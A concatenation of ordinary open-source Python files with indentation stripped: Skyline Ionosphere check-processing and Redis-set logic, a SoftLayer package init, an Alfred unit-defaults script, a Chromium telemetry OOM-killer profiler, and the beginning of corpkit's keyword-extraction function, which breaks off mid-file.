logger.info('rate_limit_feedback_metrics set to %s' % (str(rate_limit_feedback_metrics)))
if rate_limit_feedback_metrics:
for i_metric_check_file in metric_var_files_sorted:
feedback_metric = False
check_metric_file_list = i_metric_check_file.split('.', -1)[1:]
last_name_element = len(check_metric_file_list) - 1
base_name = '.'.join(check_metric_file_list[0:last_name_element])
metric_namespace_elements = base_name.split('.')
for to_skip in SKYLINE_FEEDBACK_NAMESPACES:
if to_skip in base_name:
feedback_metric = True
logger.info('SKYLINE_FEEDBACK_NAMESPACES matched on to_skip %s in base_name %s' % (to_skip, base_name))
break
to_skip_namespace_elements = to_skip.split('.')
elements_matched = set(metric_namespace_elements) & set(to_skip_namespace_elements)
if len(elements_matched) == len(to_skip_namespace_elements):
feedback_metric = True
logger.info('SKYLINE_FEEDBACK_NAMESPACES matched elements in %s' % base_name)
break
if feedback_metric:
remove_feedback_metric_check = False
if metric_var_files_count > 4:
logger.info('rate limiting feedback metric, removing check for %s as Ionosphere has %s pending checks, not checking feedback metric' % (
base_name, str(metric_var_files_count)))
remove_feedback_metric_check = True
cache_key = 'ionosphere.feedback_metric.checked.%s' % (base_name)
check_done = False
try:
check_done = self.redis_conn.get(cache_key)
except Exception as e:
logger.error('error :: could not query Redis for cache_key: %s' % e)
if not check_done:
logger.info('not removing feedback metric as no check has been done in last 600 seconds on %s' % base_name)
remove_feedback_metric_check = False
else:
logger.info('rate limiting feedback metric, removing check as %s has been checked in the last 600 seconds' % (
base_name))
remove_feedback_metric_check = True
if remove_feedback_metric_check:
metric_check_file = '%s/%s' % (settings.IONOSPHERE_CHECK_PATH, i_metric_check_file)
# @added 20200907 - Feature #3734: waterfall alerts
# Remove the metric from the waterfall_alerts Redis set
# [metric, timestamp, value, added_to_waterfall_timestamp]
# waterfall_data = [metric[1], metric[2], metric[0], added_to_waterfall_timestamp]
redis_set = 'analyzer.waterfall_alerts.sent_to_ionosphere'
metric_check_file_timestamp = i_metric_check_file.split('.', -1)[0]
literal_waterfall_alerts = []
try:
literal_waterfall_alerts = list(self.redis_conn_decoded.smembers(redis_set))
except:
literal_waterfall_alerts = []
waterfall_alerts = []
for literal_waterfall_alert in literal_waterfall_alerts:
waterfall_alert = literal_eval(literal_waterfall_alert)
waterfall_alerts.append(waterfall_alert)
for waterfall_alert in waterfall_alerts:
if waterfall_alert[0] == base_name:
if int(waterfall_alert[1]) == int(metric_check_file_timestamp):
try:
self.redis_conn.srem(redis_set, str(waterfall_alert))
logger.info('removed feedback metric waterfall alert item from Redis set %s - %s' % (
redis_set, str(waterfall_alert)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove feedback metric waterfall alert item for %s from Redis set %s' % (
base_name, redis_set))
redis_set = 'mirage.waterfall_alerts.sent_to_ionosphere'
literal_waterfall_alerts = []
try:
literal_waterfall_alerts = list(self.redis_conn_decoded.smembers(redis_set))
except:
literal_waterfall_alerts = []
waterfall_alerts = []
for literal_waterfall_alert in literal_waterfall_alerts:
waterfall_alert = literal_eval(literal_waterfall_alert)
waterfall_alerts.append(waterfall_alert)
for waterfall_alert in waterfall_alerts:
if waterfall_alert[0] == base_name:
if int(waterfall_alert[1]) == int(metric_check_file_timestamp):
try:
self.redis_conn.srem(redis_set, str(waterfall_alert))
logger.info('removed feedback metric waterfall alert item from Redis set %s - %s' % (
redis_set, str(waterfall_alert)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to remove feedback metric waterfall alert item for %s from Redis set %s' % (
base_name, redis_set))
self.remove_metric_check_file(str(metric_check_file))
# Determine metric_var_files after possible feedback metric removals
metric_var_files = False
try:
metric_var_files = [f for f in listdir(settings.IONOSPHERE_CHECK_PATH) if isfile(join(settings.IONOSPHERE_CHECK_PATH, f))]
except:
logger.error('error :: failed to list files in check dir')
logger.info(traceback.format_exc())
# @added 20200414 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# Prioritise realtime metric checks over analyzer_batch checks
# as if a lot of anomalies are submitted from analyzer_batch
# and they are processed first then real time metrics waiting to
# be processed could the max_age_seconds time limit. Batch
# anomalies are not submitted to max_age_seconds check,
# therefore they will get done in due course.
prioritise_realtime_checks = True
remove_batch_anomalies_check_files = []
realtime_metric_var_files_count = 0
batch_metric_var_files_count = 0
# If there are realtime metric anomalies and batch metric
# anomalies prioritise the realtime checks by removing the
# batch anomaly checks from the metric_var_files
if metric_var_files and prioritise_realtime_checks and BATCH_PROCESSING:
if rate_limit_feedback_metrics:
prioritise_realtime_checks = False
logger.info('prioritise_realtime_checks set to %s' % (str(prioritise_realtime_checks)))
try:
metric_var_files_sorted = []
if metric_var_files:
metric_var_files_sorted = sorted(metric_var_files)
# logger.info('prioritise_realtime_checks checking %s metrics for batch anomalies' % (str(len(metric_var_files_sorted))))
for i_metric_check_file in metric_var_files_sorted:
analyzer_batch_anomaly = None
check_file_anomaly_timestamp = None
try:
check_metric_file_list = i_metric_check_file.split('.', -1)[1:]
last_name_element = len(check_metric_file_list) - 1
base_name = '.'.join(check_metric_file_list[0:last_name_element])
i_metric_check_filename = i_metric_check_file.replace(settings.IONOSPHERE_CHECK_PATH + '/', '')
check_file_anomaly_timestamp = i_metric_check_filename.split('.', 1)[0]
except Exception as e:
logger.error('error :: could not determine anomaly_timestamp from filename %s - %s' % (
i_metric_check_file, str(e)))
check_file_anomaly_timestamp = None
# Is this a analyzer_batch related anomaly
if check_file_anomaly_timestamp:
analyzer_batch_metric_anomaly_key = 'analyzer_batch.anomaly.%s.%s' % (
str(check_file_anomaly_timestamp), base_name)
try:
analyzer_batch_anomaly = self.redis_conn.get(analyzer_batch_metric_anomaly_key)
except Exception as e:
logger.error(
'error :: could not query cache_key - %s - %s' % (
analyzer_batch_metric_anomaly_key, e))
analyzer_batch_anomaly = None
if analyzer_batch_anomaly:
logger.info('batch processing - identified as an analyzer_batch triggered anomaly from the presence of the Redis key %s' % analyzer_batch_metric_anomaly_key)
remove_batch_anomalies_check_files.append(i_metric_check_file)
batch_metric_var_files_count += 1
else:
realtime_metric_var_files_count += 1
# logger.info('batch processing - no batch anomaly Redis key found - %s' % analyzer_batch_metric_anomaly_key)
# @added 20200414 - Feature #3486: analyzer_batch
# Feature #3480: batch_processing
# If there are realtime metric anomalies and batch metric
# anomalies prioritise the realtime checks by removing the
# batch anomaly checks from the metric_var_files
realtime_metric_var_files = []
if realtime_metric_var_files_count > 0:
if remove_batch_anomalies_check_files:
for metric_var_file in metric_var_files_sorted:
if metric_var_file in remove_batch_anomalies_check_files:
logger.info('removing batch anomaly check file to prioritise realtime metric checks - %s' % str(metric_var_file))
else:
realtime_metric_var_files.append(metric_var_file)
if realtime_metric_var_files:
realtime_metric_var_files_count = len(realtime_metric_var_files)
metric_var_files = realtime_metric_var_files
logger.info('removed %s batch anomaly check files from metric_var_files list to prioritise the %s realtime metric checks' % (
str(batch_metric_var_files_count),
str(realtime_metric_var_files_count)))
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to determine batch anomalies')
if metric_var_files:
ionosphere_job = True
logger.info('%s metric check files, so set to ionosphere_job = True' % (str(len(metric_var_files))))
break
# @added 20170113 - Feature #1854: Ionosphere learn
# Added the learn variable to spawn a spawn_learn_process when
# required.
work_queue_items = 0
if settings.IONOSPHERE_LEARN:
learn_work = None
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# learn_work = self.redis_conn.smembers('ionosphere.learn.work')
learn_work = self.redis_conn_decoded.smembers('ionosphere.learn.work')
except Exception as e:
logger.error('error :: could not query Redis for ionosphere.learn.work - %s' % e)
if learn_work:
work_queue_items = len(learn_work)
if work_queue_items > 0:
learn_job = True
if learn_job:
break
# @added 20190404 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# Do not run an Ionosphere and echo checks on a metrics when a lot of
# checks are being done. Manage the Ionosphere load and increased
# runtime in general that Ionosphere echo has introduced, especially
# when Ionosphere is issued lots of checks, if lots of metrics suddenly
# become anomalous.
metric_var_files_count = 0
ionosphere_busy = False
if ionosphere_job:
metric_var_files_sorted = sorted(metric_var_files)
metric_check_file = '%s/%s' % (settings.IONOSPHERE_CHECK_PATH, str(metric_var_files_sorted[0]))
# @added 20190403 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# Added a count of the number of checks to be done
metric_var_files_count = len(metric_var_files)
# If there are more than 4 metric check files set Ionosphere to
# busy so that Ionosphere alternates between checking the normal
# Ionosphere Mirage features profiles and the Ionosphere echo
# features profiles on subsequent checks of a metric so that
# when Ionosphere is busy it is not checking both sets of
# features profiles on every run.
if metric_var_files_count > 4:
ionosphere_busy = True
# @added 20170108 - Feature #1830: Ionosphere alerts
# Adding lists of smtp_alerter_metrics and ionosphere_non_smtp_alerter_metrics
# Timed this takes 0.013319 seconds on 689 unique_metrics
unique_metrics = []
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# unique_metrics = list(self.redis_conn.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))
unique_metrics = list(self.redis_conn_decoded.smembers(settings.FULL_NAMESPACE + 'unique_metrics'))
except:
logger.error(traceback.format_exc())
logger.error('error :: could not get the unique_metrics list from Redis')
unique_metrics = []
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# The Redis analyzer.smtp_alerter_metrics list is created here to
# replace the self.ionosphere_smtp_alerter_metrics Manager.list in the below
# section
ionosphere_smtp_alerter_metrics = []
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_smtp_alerter_metrics = list(self.redis_conn.smembers('ionosphere.ionosphere_smtp_alerter_metrics'))
ionosphere_smtp_alerter_metrics = list(self.redis_conn_decoded.smembers('ionosphere.ionosphere_smtp_alerter_metrics'))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to generate a list from the ionosphere_smtp_alerter_metrics Redis set')
ionosphere_smtp_alerter_metrics = []
redis_sets_to_rename = [
'ionosphere.ionosphere_smtp_alerter_metrics',
'ionosphere.ionosphere_non_smtp_alerter_metrics'
]
for current_redis_set in redis_sets_to_rename:
new_redis_set = '%s.old' % current_redis_set
try:
self.redis_conn.rename(current_redis_set, new_redis_set)
except Exception as e:
if str(e) == 'no such key':
logger.info('could not rename Redis set %s to %s: %s' % (
current_redis_set, new_redis_set, str(e)))
else:
logger.error('error :: could not rename Redis set %s to %s: %s' % (
current_redis_set, new_redis_set, str(e)))
for metric_name in unique_metrics:
# @modified 20200728 - Bug #3652: Handle multiple metrics in base_name conversion
# base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
if metric_name.startswith(settings.FULL_NAMESPACE):
base_name = metric_name.replace(settings.FULL_NAMESPACE, '', 1)
else:
base_name = metric_name
for alert in settings.ALERTS:
pattern_match = False
if str(alert[1]) == 'smtp':
ALERT_MATCH_PATTERN = alert[0]
METRIC_PATTERN = base_name
pattern_match = False
try:
# Match by regex
alert_match_pattern = re.compile(ALERT_MATCH_PATTERN)
pattern_match = alert_match_pattern.match(METRIC_PATTERN)
if pattern_match:
pattern_match = True
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# if base_name not in self.ionosphere_smtp_alerter_metrics:
if base_name not in ionosphere_smtp_alerter_metrics:
# self.ionosphere_smtp_alerter_metrics.append(base_name)
redis_set = 'ionosphere.ionosphere_smtp_alerter_metrics'
data = base_name
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
except:
pattern_match = False
if not pattern_match:
# Match by substring
if alert[0] in base_name:
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# if base_name not in self.ionosphere_smtp_alerter_metrics:
# self.ionosphere_smtp_alerter_metrics.append(base_name)
if base_name not in ionosphere_smtp_alerter_metrics:
redis_set = 'ionosphere.ionosphere_smtp_alerter_metrics'
data = base_name
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# if base_name not in self.ionosphere_smtp_alerter_metrics:
# if base_name not in self.ionosphere_smtp_alerter_metrics:
# self.ionosphere_non_smtp_alerter_metrics.append(base_name)
if base_name not in ionosphere_smtp_alerter_metrics:
redis_set = 'ionosphere.ionosphere_non_smtp_alerter_metrics'
data = base_name
try:
self.redis_conn.sadd(redis_set, data)
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to add %s to Redis set %s' % (
str(data), str(redis_set)))
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# The Redis lists are used here to replace the self.ionosphere_
# Manager().list()
ionosphere_smtp_alerter_metrics = []
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_smtp_alerter_metrics = list(self.redis_conn.smembers('ionosphere.ionosphere_smtp_alerter_metrics'))
ionosphere_smtp_alerter_metrics = list(self.redis_conn_decoded.smembers('ionosphere.ionosphere_smtp_alerter_metrics'))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to generate a list from the ionosphere_smtp_alerter_metrics Redis set')
ionosphere_smtp_alerter_metrics = []
ionosphere_non_smtp_alerter_metrics = []
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_non_smtp_alerter_metrics = list(self.redis_conn.smembers('ionosphere.ionosphere_non_smtp_alerter_metrics'))
ionosphere_non_smtp_alerter_metrics = list(self.redis_conn_decoded.smembers('ionosphere.ionosphere_non_smtp_alerter_metrics'))
except:
logger.info(traceback.format_exc())
logger.error('error :: failed to generate a list from the ionosphere_non_smtp_alerter_metrics Redis set')
ionosphere_non_smtp_alerter_metrics = []
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# logger.info('smtp_alerter_metrics :: %s' % str(len(self.ionosphere_smtp_alerter_metrics)))
# logger.info('ionosphere_non_smtp_alerter_metrics :: %s' % str(len(self.ionosphere_non_smtp_alerter_metrics)))
logger.info('smtp_alerter_metrics :: %s' % str(len(ionosphere_smtp_alerter_metrics)))
logger.info('ionosphere_non_smtp_alerter_metrics :: %s' % str(len(ionosphere_non_smtp_alerter_metrics)))
if ionosphere_job:
# @added 20190326 - Feature #2484
# First process ionosphere_echo to create any missing
try:
ionosphere_echo_enabled = settings.IONOSPHERE_ECHO_ENABLED
except:
ionosphere_echo_enabled = False
# @added 20190403 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# If there are more than 2 metric check files, do not run
# process_ionosphere_echo to create echo features profiles
run_process_ionosphere_echo = True
if metric_var_files_count > 2:
run_process_ionosphere_echo = False
logger.info(
'not running process_ionosphere_echo as there are %s metric check files to be checked' % (
str(metric_var_files_count)))
# @added 20190527 - Feature #2484: FULL_DURATION feature profiles
# Branch #3002: docker
# Only process if there is a ionosphere.unique_metrics Redis set
if run_process_ionosphere_echo:
ionosphere_unique_metrics = []
try:
# @modified 20191030 - Bug #3266: py3 Redis binary objects not strings
# Branch #3262: py3
# ionosphere_unique_metrics = self.redis_conn.smembers('ionosphere.unique_metrics')
ionosphere_unique_metrics = self.redis_conn_decoded.smembers('ionosphere.unique_metrics')
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to get Redis smembers ionosphere.unique_metrics')
ionosphere_unique_metrics = []
# @added 20190527 - Feature #2484: FULL_DURATION feature profiles
if not ionosphere_unique_metrics:
logger.info('there are metrics in the Redis ionosphere.unique_metrics set, skipping process_ionosphere_echo')
# If there are more than 4 metric check files set Ionosphere to
# busy so that Ionosphere alternates between checking the normal
# Ionosphere Mirage features profiles and the Ionosphere echo
# features profiles on subsequent checks of a metric so that
# when Ionosphere is busy it is not checking both sets of
# features profiles on every run.
if metric_var_files_count > 4:
ionosphere_busy = True
if ionosphere_echo_enabled and run_process_ionosphere_echo:
# Spawn a single process_ionosphere_echo process
function_name = 'process_ionosphere_echo'
pids = []
spawned_pids = []
pid_count = 0
now = time()
for i in range(1, IONOSPHERE_PROCESSES + 1):
try:
p = Process(target=self.process_ionosphere_echo, args=(i, metric_check_file))
pids.append(p)
pid_count += 1
logger.info(
'starting %s of %s %s' % (
str(pid_count), str(IONOSPHERE_PROCESSES),
function_name))
p.start()
spawned_pids.append(p.pid)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to start %s' % function_name)
continue
# Self monitor the process and terminate if the
# process_ionosphere_echo has run for too long
try:
ionosphere_echo_max_fp_create_time = settings.IONOSPHERE_ECHO_MAX_FP_CREATE_TIME
except:
ionosphere_echo_max_fp_create_time = 55
p_starts = time()
while time() - p_starts <= ionosphere_echo_max_fp_create_time:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info(
'%s %s completed in %.2f seconds' % (
str(IONOSPHERE_PROCESSES),
function_name, time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('timed out, killing all %s processes' % (function_name))
for p in pids:
try:
p.terminate()
# p.join()
logger.info('killed %s process' % (function_name))
except:
logger.error(traceback.format_exc())
logger.error('error :: killing all %s processes' % function_name)
logger.info('processing - %s' % str(metric_var_files_sorted[0]))
function_name = 'spin_process'
# @added 20170109 - Feature #1854: Ionosphere learn
# Added the learn variable to spawn a spawn_learn_process when
# required.
# @added 20170112 - Feature #1854: Ionosphere learn - Redis ionosphere.learn.work namespace
# Ionosphere learn needs Redis works sets
# When a features profile is created there needs to be work added to a Redis
# set
# When a human makes a features profile, we want Ionosphere to make a
# use_full_duration_days features profile valid_learning_duration (e.g.
# 3361) later.
if learn_job:
logger.info('processing - learn work queue - %s' % str(work_queue_items))
function_name = 'spawn_learn_process'
# Spawn processes
pids = []
spawned_pids = []
pid_count = 0
now = time()
# @modified 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# for i in range(1, settings.IONOSPHERE_PROCESSES + 1):
for i in range(1, IONOSPHERE_PROCESSES + 1):
if ionosphere_job:
try:
# @modified 20190404 - Bug #2904: Initial Ionosphere echo load and Ionosphere feedback
# Feature #2484: FULL_DURATION feature profiles
# Added ionosphere_busy if there are queued checks
# to ensure that Ionosphere echo is rate limited if a
# lot of metrics become anomalous and that Ionosphere
# alternates between normal Mirage features profiles
# comparisons and Ionosphere echo features profiles
# during busy times.
# p = Process(target=self.spin_process, args=(i, metric_check_file))
p = Process(target=self.spin_process, args=(i, metric_check_file, ionosphere_busy))
pids.append(p)
pid_count += 1
logger.info(
'starting %s of %s %s' % (
str(pid_count),
# @modified 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# str(settings.IONOSPHERE_PROCESSES),
str(IONOSPHERE_PROCESSES),
function_name))
p.start()
spawned_pids.append(p.pid)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to start %s' % function_name)
continue
# @added 20170113 - Feature #1854: Ionosphere learn - Redis ionosphere.learn.work namespace
if learn_job:
try:
p = Process(target=self.spawn_learn_process, args=(i, int(now)))
pids.append(p)
pid_count += 1
logger.info(
'starting %s of %s %s' % (
str(pid_count),
# @modified 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# str(settings.IONOSPHERE_PROCESSES),
str(IONOSPHERE_PROCESSES),
function_name))
p.start()
spawned_pids.append(p.pid)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to start %s' % function_name)
continue
# Self monitor processes and terminate if any spin_process has run
# for to long
p_starts = time()
# @modified 20180621 - Feature #2404: Ionosphere - fluid approximation
# Increase run time to 55 seconds to allow for Min-Max scaling
# while time() - p_starts <= 20:
# @modified 20190327 - Feature #2484: FULL_DURATION feature profiles
# Added ionosphere_echo which takes more time
# while time() - p_starts <= 55:
try:
ionosphere_max_runtime = settings.IONOSPHERE_MAX_RUNTIME
except:
ionosphere_max_runtime = 120
while time() - p_starts <= ionosphere_max_runtime:
if any(p.is_alive() for p in pids):
# Just to avoid hogging the CPU
sleep(.1)
else:
# All the processes are done, break now.
time_to_run = time() - p_starts
logger.info(
'%s %s completed in %.2f seconds' % (
# @modified 20180819 - Task #2526: Hard code IONOSPHERE_PROCESSES to 1
# str(settings.IONOSPHERE_PROCESSES),
str(IONOSPHERE_PROCESSES),
function_name, time_to_run))
break
else:
# We only enter this if we didn't 'break' above.
logger.info('timed out, killing all %s processes' % (function_name))
for p in pids:
try:
p.terminate()
# p.join()
logger.info('killed %s process' % (function_name))
except:
logger.error(traceback.format_exc())
logger.error('error :: killing all %s processes' % function_name)
if ionosphere_job:
check_file_name = os.path.basename(str(metric_check_file))
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_name - %s' % check_file_name)
check_file_timestamp = check_file_name.split('.', 1)[0]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_timestamp - %s' % str(check_file_timestamp))
check_file_metricname_txt = check_file_name.split('.', 1)[1]
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname_txt - %s' % check_file_metricname_txt)
check_file_metricname = check_file_metricname_txt.replace('.txt', '')
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname - %s' % check_file_metricname)
check_file_metricname_dir = check_file_metricname.replace('.', '/')
if settings.ENABLE_IONOSPHERE_DEBUG:
logger.info('debug :: check_file_metricname_dir - %s' % check_file_metricname_dir)
metric_failed_check_dir = '%s/%s/%s' % (failed_checks_dir, check_file_metricname_dir, check_file_timestamp)
fail_check(skyline_app, metric_failed_check_dir, str(metric_check_file))
for p in pids:
if p.is_alive():
# @modified 20191031 - Bug #3296: Ionosphere spawn_learn_process hanging on docker
# Branch #3002 - docker
# Use terminate not join for docker
# logger.info('stopping %s - %s' % (function_name, str(p.is_alive())))
# p.join()
logger.info('killing %s - %s' % (function_name, str(p.is_alive())))
p.terminate()
# @added 20170108 - Feature #1830: Ionosphere alerts
# Reset added lists of ionospehere_smtp_alerter_metrics and
# ionosphere_non_smtp_alerter_metrics
# @modified 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# self.ionosphere_smtp_alerter_metrics[:] = []
# self.ionosphere_non_smtp_alerter_metrics[:] = []
# @added 20190522 - Task #3034: Reduce multiprocessing Manager list usage
# Use Redis sets instead of Manager().list()
# delete_redis_sets = [
# 'ionosphere.ionosphere_smtp_alerter_metrics',
# 'ionosphere.ionosphere_non_smtp_alerter_metrics',
# ]
delete_redis_sets = [
'ionosphere.ionosphere_smtp_alerter_metrics.old',
'ionosphere.ionosphere_non_smtp_alerter_metrics.old',
]
for i_redis_set in delete_redis_sets:
redis_set_to_delete = i_redis_set
try:
self.redis_conn.delete(redis_set_to_delete)
logger.info('deleted Redis set - %s' % redis_set_to_delete)
except:
logger.error(traceback.format_exc())
logger.error('error :: failed to delete Redis set - %s' % redis_set_to_delete)
|
SoftLayer/CLI/block/__init__.py | dvzrv/softlayer-python | 126 | 12610658 | """Block Storage."""
|
Alfred/Alfred.alfredpreferences/workflows/user.workflow.5FE79F4C-9E12-42C8-9147-B4F1207AB4AE/defaults.py | rouxbuciu/prefs | 682 | 12610671 | #!/usr/bin/env python
# encoding: utf-8
#
# Copyright (c) 2017 <NAME> <<EMAIL>>
#
# MIT Licence. See http://opensource.org/licenses/MIT
#
# Created on 2017-07-16
#
"""defaults.py (save|delete) <dimensionality> <unit>
Save/delete default units for given dimensionality.
Usage:
defaults.py save <dimensionality> <unit>
defaults.py delete <dimensionality> <unit>
defaults.py --help
Options:
-h, --help Show this message
"""
from __future__ import print_function, absolute_import
from collections import defaultdict
from docopt import docopt
from workflow import Workflow3
log = None
class Defaults(object):
"""Manage default units for dimensionalities.
Saves default units in workflow's settings file.
"""
def __init__(self, wf):
"""Create new `Defaults` for workflow.
Args:
wf (Workflow3): Active Workflow3 object.
"""
self._wf = wf
self._defs = self._load()
def defaults(self, dimensionality):
"""Default units for dimensionality.
Args:
dimensionality (str): Dimensionality to return units for
Returns:
list: Sequence of default units
"""
return self._defs[dimensionality][:]
def add(self, dimensionality, unit):
"""Save ``unit`` as default for ``dimensionality``.
Args:
dimensionality (str): Dimensionality
unit (str): Unit
"""
if not self.is_default(dimensionality, unit):
self._defs[dimensionality].append(unit)
self._save()
def remove(self, dimensionality, unit):
"""Remove ``unit`` as default for ``dimensionality``.
Args:
dimensionality (str): Dimensionality
unit (str): Unit
"""
if self.is_default(dimensionality, unit):
self._defs[dimensionality].remove(unit)
self._save()
def is_default(self, dimensionality, unit):
"""Check whether ``unit`` is a default for ``dimensionality``.
Args:
dimensionality (str): Dimensionality
unit (str): Unit
Returns:
bool: ``True`` if ``unit`` is a default.
"""
return unit in self._defs[dimensionality]
def _load(self):
defs = defaultdict(list)
defs.update(self._wf.settings.get('default_units', {}))
return defs
def _save(self):
self._wf.settings['default_units'] = dict(self._defs)
def main(wf):
"""Run script."""
args = docopt(__doc__, wf.args)
log.debug('args=%r', args)
defs = Defaults(wf)
log.debug('defaults=%r', defs._defs)
dimensionality = args['<dimensionality>']
unit = args['<unit>']
if args['save']:
defs.add(dimensionality, unit)
print(u'Saved {} as default unit for {}'.format(unit, dimensionality))
return
if args['delete']:
defs.remove(dimensionality, unit)
print(u'Removed {} as default unit for {}'.format(unit, dimensionality))
return
if __name__ == '__main__':
wf = Workflow3()
log = wf.logger
wf.run(main)
|
tools/telemetry/telemetry/core/platform/profiler/oomkiller_profiler.py | nagineni/chromium-crosswalk | 231 | 12610682 | <reponame>nagineni/chromium-crosswalk<gh_stars>100-1000
# Copyright 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import os
from telemetry.core import util
from telemetry.core.backends.chrome import android_browser_finder
from telemetry.core.platform import profiler
class UnableToFindApplicationException(Exception):
"""Exception when unable to find a launched application"""
def __init__(self, application):
super(UnableToFindApplicationException, self).__init__()
self.application = application
def __str__(self):
return repr(self.application)
class OOMKillerProfiler(profiler.Profiler):
"""Android-specific, Launch the music application and check it is still alive
at the end of the run."""
def __init__(self, browser_backend, platform_backend, output_path, state):
super(OOMKillerProfiler, self).__init__(
browser_backend, platform_backend, output_path, state)
if not 'mem_consumer_launched' in state:
state['mem_consumer_launched'] = True
mem_consumer_path = util.FindSupportBinary(
os.path.join('apks', 'MemConsumer.apk'),
executable=False)
assert mem_consumer_path, ('Could not find memconsumer app. Please build '
'memconsumer target.')
self._browser_backend.adb.Install(mem_consumer_path)
self._browser_backend.adb.GoHome()
self._platform_backend.LaunchApplication(
'org.chromium.memconsumer/.MemConsumer',
'--ei memory 20')
# Bring the browser to the foreground after launching the mem consumer
self._browser_backend.adb.StartActivity(browser_backend.package,
browser_backend.activity,
True)
@classmethod
def name(cls):
return 'oomkiller'
@classmethod
def is_supported(cls, browser_type):
if browser_type == 'any':
return android_browser_finder.CanFindAvailableBrowsers()
return browser_type.startswith('android')
@classmethod
def WillCloseBrowser(cls, browser_backend, platform_backend):
browser_backend.adb.CloseApplication('org.chromium.memconsumer')
def CollectProfile(self):
missing_applications = self._MissingApplications()
if not len(missing_applications):
return []
raise UnableToFindApplicationException(', '.join(missing_applications))
def _MissingApplications(self):
# TODO(qsr): Add com.android.launcher to the list, when the reason why the
# launcher is often killed is understood.
must_have_apps = [
'org.chromium.memconsumer',
]
return [app for app in must_have_apps if
not self._platform_backend.IsApplicationRunning(app)]
|
corpkit/keys.py | interrogator/corpk | 216 | 12610685 | <filename>corpkit/keys.py
"""corpkit: simple keyworder"""
from __future__ import print_function
from corpkit.constants import STRINGTYPE, PYTHON_VERSION
def keywords(target_corpus,
reference_corpus='bnc.p',
threshold=False,
selfdrop=True,
calc_all=True,
measure='ll',
sort_by=False,
print_info=False,
**kwargs):
"""Feed this function some target_corpus and get its keywords"""
from pandas import DataFrame, Series
from collections import Counter
from corpkit.interrogation import Interrogation
def data_to_dict(target_corpus):
"""turn Series/DataFrame into Counter"""
if isinstance(target_corpus, Interrogation):
if hasattr(target_corpus, 'results'):
target_corpus = target_corpus.results
else:
target_corpus = target_corpus.totals
if isinstance(target_corpus, Series):
return Counter(target_corpus.to_dict())
elif isinstance(target_corpus, DataFrame):
return Counter(target_corpus.sum().to_dict())
else:
return Counter(target_corpus)
def log_likelihood_measure(word_in_ref, word_in_target, ref_sum, target_sum):
"""calc log likelihood keyness"""
import math
neg = (word_in_target / float(target_sum)) < (word_in_ref / float(ref_sum))
E1 = float(ref_sum)*((float(word_in_ref)+float(word_in_target)) / \
(float(ref_sum)+float(target_sum)))
E2 = float(target_sum)*((float(word_in_ref)+float(word_in_target)) / \
(float(ref_sum)+float(target_sum)))
if word_in_ref == 0:
logaE1 = 0
else:
logaE1 = math.log(word_in_ref/E1)
if word_in_target == 0:
logaE2 = 0
else:
logaE2 = math.log(word_in_target/E2)
score = float(2* ((word_in_ref*logaE1)+(word_in_target*logaE2)))
if neg:
score = -score
return score
def perc_diff_measure(word_in_ref, word_in_target, ref_sum, target_sum):
"""calculate using perc diff measure"""
norm_target = float(word_in_target) / target_sum
norm_ref = float(word_in_ref) / ref_sum
# Gabrielatos and Marchi (2012) do it this way!
if norm_ref == 0:
norm_ref = 0.00000000000000000000000001
return ((norm_target - norm_ref) * 100.0) / norm_ref
def set_threshold(threshold):
"""define a threshold"""
if threshold is False:
return 0
if threshold is True:
threshold = 'm'
if isinstance(threshold, STRINGTYPE):
if threshold.startswith('l'):
denominator = 800
if threshold.startswith('m'):
denominator = 400
if threshold.startswith('h'):
denominator = 100
totwords = sum(loaded_ref_corpus.values())
return float(totwords) / float(denominator)
else:
return threshold
def calc_keywords(target_corpus, reference_corpus):
"""
